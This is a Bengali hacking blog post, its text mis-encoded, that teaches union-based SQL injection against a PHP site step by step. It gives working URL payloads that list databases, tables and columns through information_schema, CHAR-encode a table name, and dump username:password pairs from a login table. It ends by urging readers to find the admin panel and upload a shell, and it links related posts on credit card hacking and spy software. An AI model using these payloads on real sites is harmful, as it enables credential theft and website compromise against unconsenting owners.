āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
āĻāĻŽāĻŋ āĻāĻāĻžāĻ¨ā§ 0x3a āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻāĻŋ āĻāĻāĻž āĻšāĻ˛ā§ āĻ¸ā§āĻŽāĻŋāĻā§āĻ˛āĻ¨ (;) āĻāĻ° āĻšā§āĻā§āĻ¸ āĻā§āĻ¯āĻžāĻ˛ā§
āĻāĻāĻž āĻĻā§āĻāĻāĻž āĻĄāĻŋāĻĢāĻžāĻ°ā§āĻ¨ā§āĻ āĻā§āĻ¯āĻžāĻ˛ā§ āĻā§ āĻĄāĻŋāĻĢāĻžāĻ°ā§āĻ¨ā§āĻ āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ° āĻ āĻ¸ā§āĻĒāĻžāĻ°ā§āĻ āĻāĻ°ā§ āĻĻā§āĻāĻžāĻŦā§āĨ¤
āĻāĻāĻ¨ āĻĻā§āĻāĻž āĻ¯āĻžāĻŦā§ āĻ¯ā§ ā§Š āĻāĻ° ā§Ē āĻ¨āĻŽā§āĻŦāĻ° āĻā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻāĻā§āĻ° āĻāĻžā§āĻāĻžā§ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻāĻžāĻ°ā§āĻ¸āĻ¨ āĻāĻŦāĻ
āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§āĻ° āĻāĻāĻāĻžāĻ°ā§āĻ° āĻ¨āĻžāĻŽ āĻĻā§āĻāĻžāĻŦā§āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž āĻā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻāĻā§āĻ° āĻ¯ā§ āĻ¯ā§ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻ¸ā§āĻāĻž āĻŦā§āĻ° āĻāĻ°āĻŦā§āĨ¤
āĻ¤āĻžāĻ° āĻāĻ¨ā§āĻ¯ā§ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻ˛āĻžāĻŽ āĻ¨ā§āĻŽā§āĻ° āĻāĻžā§āĻāĻžā§ SQL QUERY āĻĻāĻŋā§ā§ āĻ°āĻŋāĻĒā§āĻ˛ā§āĻ¸ āĻāĻ°āĻ¤ā§ āĻšāĻŦā§āĨ¤
āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž āĻĻā§āĻāĻāĻž āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦā§
āĻāĻāĻāĻŋ information_schema āĻāĻ°ā§āĻāĻāĻŋ site_database āĻāĻāĻž āĻ¸āĻžāĻāĻ āĻāĻĄāĻŽāĻŋāĻ¨ āĻ¯ā§ āĻ¨āĻžāĻŽā§ āĻĻāĻŋā§ā§āĻā§ āĻ¸ā§ āĻ¨āĻžāĻŽā§ āĻšāĻŦā§
āĻāĻāĻ¨ information_schema āĻ¨āĻŋā§ā§ āĻāĻŽāĻžāĻĻā§āĻ° āĻā§āĻ¨ā§ āĻāĻžāĻ āĻ¨ā§āĻ āĻāĻžāĻ°āĻŖ
āĻāĻžāĻ°āĻŖ information_schema āĻ¤ā§ āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽ āĻā§āĻŦāĻŋāĻ˛ āĻĨāĻžāĻā§ āĻ¯āĻž āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻā§ āĻĄāĻŋāĻĢāĻžāĻāĻ¨ āĻāĻ°ā§āĨ¤
āĻāĻŽāĻ°āĻž āĻāĻ āĻā§āĻŦāĻŋāĻ˛ āĻā§āĻ˛ā§ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§āĻ° āĻ˛ā§-āĻāĻāĻ āĻ¸ā§āĻāĻžāĻāĻ˛ āĻā§āĻ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĨ¤
āĻ¯āĻžā§ āĻšā§āĻ āĻāĻāĻā§āĻ˛āĻž āĻ
āĻ¨ā§āĻ āĻāĻĄāĻāĻžāĻ¨ā§āĻ¸ āĻ˛ā§āĻā§āĻ˛ā§āĻ° āĻāĻĨāĻž āĻŦāĻžāĻ°ā§āĻ¤āĻž āĻ˛ā§āĻ˛ :p
āĻ¯āĻž āĻāĻāĻ¨ āĻāĻĒāĻ¨āĻžāĻ°āĻž āĻŦā§āĻāĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨ āĻ¨āĻžāĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻā§ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻāĻā§ (āĻāĻ¸āĻ˛ā§ āĻāĻŽāĻžāĻĻā§āĻ° āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§āĻ° āĻ¨āĻžāĻŽ āĻā§āĻ āĻāĻ°āĻžāĻ° āĻĻāĻ°āĻāĻžāĻ° āĻāĻŋāĻ˛ā§ āĻ¨āĻž
āĻāĻŽāĻŋ āĻļā§āĻ§ā§ āĻļā§āĻāĻžāĻ° āĻāĻĻā§āĻĻā§āĻļā§āĻ¯ā§ āĻ¸ā§āĻ āĻŦāĻŋāĻˇā§ā§ āĻŦāĻ˛āĻ˛āĻžāĻŽāĨ¤āĻāĻŽāĻ°āĻž āĻ¯āĻĻāĻŋ āĻ¸āĻžāĻāĻā§āĻ° āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻĨā§āĻā§ āĻĄāĻžāĻāĻž āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻ¤ā§ āĻāĻžā§
āĻ¤āĻžāĻšāĻ˛ā§ āĻāĻŽāĻ°āĻž āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻĢāĻžāĻāĻļāĻ¨ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻ āĻĄāĻžāĻāĻž āĻĄāĻžāĻŽā§āĻĒ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŋāĨ¤
āĻ¸ā§ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§ site_database āĻāĻ° āĻ¨āĻžāĻŽ āĻāĻžāĻ¨āĻžāĻ° āĻāĻ° āĻĻāĻ°āĻāĻžāĻ° āĻšāĻŦā§ āĻ¨āĻžāĨ¤
āĻāĻŽāĻ°āĻž āĻāĻ āĻāĻŋāĻāĻā§āĻ°āĻŋā§āĻžāĻ˛ā§ database() āĻāĻ āĻĢāĻžāĻāĻļāĻ¨ āĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻĄāĻžāĻāĻž āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻŦā§āĨ¤)
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻĨā§āĻā§ āĻā§āĻŦāĻŋāĻ˛āĻ¸ āĻŦā§āĻ° āĻāĻ°āĻŦā§āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž where āĻāĻ¨ā§āĻĄāĻŋāĻļāĻ¨ āĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°āĻŦā§ āĻāĻ query āĻ¤ā§āĨ¤
āĻāĻŽāĻ°āĻž āĻā§āĻŦāĻŋāĻ˛āĻ¸ āĻ¨ā§āĻŽ āĻŦā§āĻ° āĻāĻ°āĻŦā§ select statement āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§
āĻāĻŦāĻ where āĻāĻ¨ā§āĻĄāĻŋāĻļāĻ¨āĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°āĻŦā§ āĻāĻāĻž āĻĻā§āĻāĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ā§ āĻā§āĻ¨ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻĨā§āĻā§ āĻāĻŽāĻ°āĻž āĻā§āĻŦāĻŋāĻ˛āĻ¸
āĻŦā§āĻ° āĻāĻ°āĻ¤ā§ āĻāĻžāĻā§āĻāĻŋāĨ¤
āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--
āĻāĻāĻ¨ āĻāĻĒāĻ¨āĻŋ āĻā§āĻŦāĻŋāĻ˛āĻ¸ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦā§āĻ¨āĨ¤
āĻŽāĻ¨ā§ āĻāĻ°ā§āĻ¨ āĻāĻ āĻā§āĻŦāĻŋāĻ˛āĻ¸ āĻā§āĻ˛āĻž āĻāĻŽāĻ°āĻž āĻĒā§āĻ˛āĻžāĻŽāĨ¤
- archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit
āĻāĻāĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻĻā§āĻāĻ¤ā§ āĻšāĻŦā§ āĻāĻ āĻā§āĻ˛ā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻ¸ā§āĻ¨āĻ¸ā§āĻāĻŋāĻ āĻā§āĻŦāĻŋāĻ˛ āĻā§āĻ¨āĻāĻž āĻ¯ā§āĻāĻžāĻ¨ā§ āĻā§āĻ°ā§āĻ¤ā§āĻŦāĻĒā§āĻ°ā§āĻŖ āĻĄāĻžāĻāĻž āĻĨāĻžāĻāĻŦā§ ?
āĻ¸ā§āĻāĻž āĻšāĻā§āĻā§ login āĻā§āĻŦāĻŋāĻ˛āĨ¤
āĻāĻ āĻāĻ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§ āĻāĻ āĻāĻ āĻ°āĻāĻŽ āĻšāĻ¤ā§ āĻĒāĻžāĻ°ā§ āĻā§āĻŦāĻŋāĻ˛ āĻ¨ā§āĻŽāĨ¤ āĻ¨āĻŋāĻā§āĻ° āĻŦā§āĻĻā§āĻ§āĻŋ āĻāĻžāĻāĻžāĻ¨!
āĻāĻŽāĻ°āĻž āĻāĻāĻ¨ login āĻā§āĻŦāĻŋāĻ˛ āĻĨā§āĻā§ āĻĄāĻžāĻāĻž āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻŦā§ āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž group_concat(table_name) āĻā§ group_concat(column_name) āĻāĻŦāĻ information_schema.tables āĻā§ information_schema.columns
āĻĻāĻŋā§ā§ āĻ°āĻŋāĻĒā§āĻ˛ā§āĻ¸ āĻāĻ°āĻŦā§ āĻāĻŦāĻ table_schema āĻāĻ° āĻāĻžā§āĻāĻžā§ table_name āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°āĻŦā§āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻžāĻ°āĻž table_name āĻā§ āĻāĻāĻāĻŋ āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ° āĻĻāĻŋāĻŦā§ āĻā§āĻŦāĻ˛ āĻ¨ā§āĻŽ āĻāĻŋ quote āĻ āĻ¨āĻŋā§ā§ āĻāĻ¸āĻŦā§
table_name='login'
āĻāĻŽāĻ°āĻž qoute āĻā§āĻ¨ā§ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°āĻ˛āĻžāĻŽ??
āĻāĻžāĻ°āĻŖ āĻāĻāĻžāĻ° āĻĄāĻžāĻāĻž āĻāĻžāĻāĻĒ varchar...
āĻ
āĻ¨ā§āĻ āĻ¸āĻŽā§ āĻāĻ āĻĒāĻĻā§āĻ§āĻ¤āĻŋ āĻāĻŋ āĻāĻžāĻ āĻāĻ°ā§ āĻ¨āĻžāĻš...
āĻ¸ā§ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§ āĻā§āĻŦāĻŋāĻ˛ āĻ¨āĻžāĻŽ āĻā§ char āĻ āĻ°ā§āĻĒāĻžāĻ¨ā§āĻ¤āĻ° āĻāĻ°āĻ¤ā§ āĻšā§āĨ¤
āĻāĻāĻž āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ā§ āĻŽā§āĻāĻŋāĻ˛āĻž āĻĢāĻžā§āĻžāĻ° āĻĢāĻā§āĻ¸ā§ āĻšā§āĻ¯āĻžāĻāĻŦāĻžāĻ° āĻ¨āĻžāĻŽā§ āĻāĻāĻāĻŋ āĻāĻĄāĻ
āĻ¨ āĻāĻā§ āĻāĻāĻž āĻāĻĄ āĻāĻ°ā§ āĻ¨āĻŋāĻ¨āĨ¤
āĻ¸āĻšāĻā§āĻ° char āĻ āĻ°ā§āĻĒāĻžāĻ¨ā§āĻ¤āĻ° āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨āĨ¤
āĻāĻŽāĻŋ login table āĻāĻžāĻā§ char āĻ āĻ°ā§āĻĒāĻžāĻ¨ā§āĻ¤āĻ° āĻāĻ°āĻžāĻ° āĻĒāĻ° āĻ¸ā§āĻāĻž āĻšāĻ˛ā§
CHAR(108, 111, 103, 105, 110)
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž āĻāĻŽāĻžāĻ¨ā§āĻĄāĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻŋāĻāĻžāĻŦā§ āĻāĻ°ā§ āĻ¸ā§āĻāĻž āĻĻā§āĻāĻŦā§āĨ¤
āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž login āĻā§āĻŦāĻŋāĻ˛ā§āĻ° āĻāĻ˛āĻžāĻŽ āĻā§āĻ˛ā§ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦā§
āĻāĻŽāĻŋ āĻ¯āĻž āĻ¯āĻž āĻĒā§āĻ˛āĻžāĻŽāĨ¤
id,username,password,email,date_added,lastlogin,sessionid,type,status
āĻāĻāĻ¨ āĻāĻ¸āĻ˛ āĻāĻžāĻ āĻļā§āĻ°ā§ āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž āĻāĻ˛āĻžāĻŽ āĻĨā§āĻā§ id āĻāĻŦāĻ password āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻŦā§ āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž (username,0x3a,password) āĻāĻ āĻāĻŽāĻžāĻ¨ā§āĻĄāĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°āĻŦā§
āĻāĻŦāĻ login āĻā§āĻŦāĻŋāĻ˛ āĻĨā§āĻā§ āĻāĻ āĻĻā§āĻāĻāĻŋ āĻāĻ˛āĻžāĻŽā§āĻ° āĻĄāĻžāĻāĻž āĻŦā§āĻ° āĻāĻ°āĻŦā§ āĨ¤
āĻ¯āĻžāĻ° āĻāĻ¨ā§āĻ¯ā§ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻšāĻŦā§āĨ¤
āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
http://www.exaplme.sqlsite.com/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--
āĻāĻāĻ¨ āĻāĻĒāĻ¨āĻŋ username āĻāĻŦāĻ password āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦā§āĻ¨āĨ¤
āĻāĻāĻ¨ āĻāĻĒāĻ¨āĻžāĻ° āĻāĻžāĻ āĻšāĻŦā§ āĻāĻĄāĻŽāĻŋāĻ¨ āĻĒā§āĻ¯āĻžāĻ¨ā§āĻ˛ āĻŦā§āĻ° āĻāĻ°ā§ āĻ¸āĻžāĻāĻāĻāĻž āĻ¤ā§ āĻļā§āĻ˛ āĻāĻĒāĻ˛ā§āĻĄ āĻāĻ°ā§ āĻšā§āĻ¯āĻžāĻ āĻāĻ°ā§ āĻĢā§āĻ˛āĻž 
āĻāĻŽāĻŋ āĻāĻāĻŋ āĻĢā§āĻāĻ¸āĻŦā§āĻā§āĻ http://facebook.com/zayyan.ahmed.71
āĻ¯āĻĻāĻŋ āĻā§āĻ āĻ°āĻŋāĻā§āĻāĻ¸ā§āĻ āĻĒāĻžāĻ āĻžāĻ¨ āĻĻā§āĻž āĻāĻ°ā§ āĻāĻāĻāĻž āĻŽā§āĻ¸ā§āĻ āĻĻāĻŋā§ā§ āĻĻāĻŋāĻŦā§āĻ¨ āĻ¸āĻžāĻĨā§āĨ¤
āĻ¯āĻžāĻ¤ā§ āĻŦā§āĻāĻ¤ā§ āĻ¸ā§āĻŦāĻŋāĻ§āĻž āĻšā§āĨ¤
āĻĒā§āĻ°āĻžā§ āĻĒāĻžāĻāĻ āĻāĻ¨ā§āĻāĻž āĻāĻˇā§āĻ āĻāĻ°ā§ āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖ āĻāĻŋāĻāĻ¨āĻāĻž āĻ˛ā§āĻāĻ˛āĻžāĻŽ, āĻāĻļāĻž āĻāĻ°āĻŋ āĻāĻĒāĻ¨āĻžāĻĻā§āĻ° āĻ
āĻ¨ā§āĻ āĻāĻžāĻ˛ā§ āĻ˛ā§āĻā§āĻā§āĨ¤
āĻāĻāĻžāĻŽāĻŋ āĻāĻŋāĻāĻā§āĻ°āĻŋā§āĻžāĻ˛ā§ String Based Sql Injection āĻ¨āĻŋā§ā§ āĻ˛ā§āĻāĻžāĻ° āĻā§āĻˇā§āĻāĻž āĻāĻ°āĻŦā§āĨ¤
āĻ§āĻ¨ā§āĻ¯āĻŦāĻžāĻĻ āĻ˛ā§āĻāĻ---
http://facebook.com/zayyan.ahmed.71
Related Post
āĻā§āĻ°ā§āĻĄāĻŋāĻ āĻāĻžāĻ°ā§āĻĄ āĻšā§āĻ¯āĻžāĻāĻŋāĻ : āĻĒā§āĻ°āĻ¯ā§āĻā§āĻ¤āĻŋāĻ° āĻāĻ āĻāĻļāĻāĻāĻžāĻāĻ¨āĻ āĻ
āĻĒāĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° (āĻĒāĻ°ā§āĻŦ ā§Š)āĻāĻā§āĻ° āĻĻā§āĻā§ āĻĒāĻ°ā§āĻŦā§ āĻāĻ˛ā§āĻāĻ¨āĻž āĻāĻ°ā§āĻāĻŋāĻ˛āĻžāĻŽ āĻāĻŋāĻāĻžāĻŦā§ āĻ¸āĻžāĻ°ā§āĻ āĻāĻā§āĻāĻŋāĻ¨ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻā§āĻ°ā§āĻĄāĻŋāĻ āĻāĻžāĻ°ā§āĻĄ āĻāĻžāĻ°ā§āĻĄ āĻāĻ° āĻ¤āĻĨā§āĻ¯ āĻ¸āĻāĻā§āĻ°āĻš- āĻ¨āĻŋā§ā§ āĻ¨āĻŋāĻ¨ TOTAL SPY 3.0+PATCH āĻšāĻžāĻāĻŋāĻ° āĻšāĻ˛āĻžāĻŽ āĻāĻāĻāĻŋ āĻ¸āĻĢāĻāĻā§ā§āĻ¯āĻžāĻ° āĻ¨āĻŋā§ā§āĨ¤ āĻ¸āĻĢāĻāĻā§ā§āĻ¯āĻžāĻ° āĻāĻŋāĻ° āĻ¨āĻžāĻŽ total spy. āĻāĻāĻŋ open āĻāĻ°āĻžāĻ° āĻĒāĻ° āĻāĻĒāĻ¨āĻŋ āĻ¯āĻžāĻ āĻāĻ°ā§āĻ¨ āĻ¨āĻž āĻā§āĻ¨
āĻĒā§āĻ¸ā§āĻ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻāĻŋāĻ¤ āĻ¸āĻŽāĻ¸ā§āĻ¯āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻŽāĻ¨ā§āĻ¤āĻŦā§āĻ¯ āĻĻāĻŋāĻ¨āĨ¤āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄ āĻ˛āĻŋāĻā§āĻ āĻ āĻ¸āĻŽāĻ¸ā§āĻ¯āĻž āĻāĻ¨ā§āĻ¯ āĻāĻ¨āĻŦāĻā§āĻ¸ āĻāĻ°ā§āĻ¨ Aimzworld007
ConversionConversion EmoticonEmoticon